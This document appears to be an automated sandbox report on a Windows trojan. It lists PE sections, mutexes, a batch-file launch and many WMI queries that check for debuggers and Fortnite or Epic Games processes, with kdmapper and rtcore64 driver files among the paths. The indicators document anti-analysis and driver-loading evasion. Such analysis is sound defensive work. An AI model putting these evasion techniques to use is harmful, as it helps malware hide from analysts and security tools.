                                Source: physmeme.exe.31.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: msedge.exe.52.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: winlogon.exe.161.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: rtcore64.exe.55.drStatic PE information: Section: ZhxHw+ ZLIB complexity 1.0003276837624584
                                Source: ITDiARjW.log.161.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: QGjYUwSA.log.161.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: oLoCRyrD.log.161.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: XEXXxLMp.log.161.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                Source: curl.exe, 00000037.00000003.1493418060.000002E955E60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1492915599.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1492740974.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000003.1483341577.000002E955EBD000.00000004.00000020.00020000.00000000.sdmp, rtcore64.exe.55.drBinary or memory string: ".vbp
                                Source: classification engineClassification label: mal100.troj.evad.winEXE@1457/107@33/6
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EC6C74 GetLastError,FormatMessageW,52_2_00EC6C74
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 47_2_004345E0 CoCreateInstance,47_2_004345E0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,52_2_00EDA6C2
                                Source: C:\Windows\Speech\physmeme.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.logJump to behavior
                                Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:8080:120:WilError_03
                                Source: C:\Edge\msedge.exeMutant created: NULL
                                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2084
                                Source: C:\Edge\msedge.exeMutant created: \Sessions\1\BaseNamedObjects\Local\JFIOSDHSUDFHUSIDGHHDJCXZCHBKLJZGVHSKDFGOIUYDSGYOIYD
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                                Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\38f46005-2bf8-4f56-87ab-0a058e61e02e
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxname52_2_00EDDF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: sfxstime52_2_00EDDF1E
                                Source: C:\Windows\Speech\kdmapper.exeCommand line argument: STARTDLG52_2_00EDDF1E
                                Source: UY9hUZn4CQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "OllyDbg.exe")
                                Source: C:\Windows\Speech\imxyvi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\curl.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg64.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\Speech\physmeme.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "OllyDbg.exe")
                                Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\WerFault.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\Speech\kdmapper.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\Speech\rtcore64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
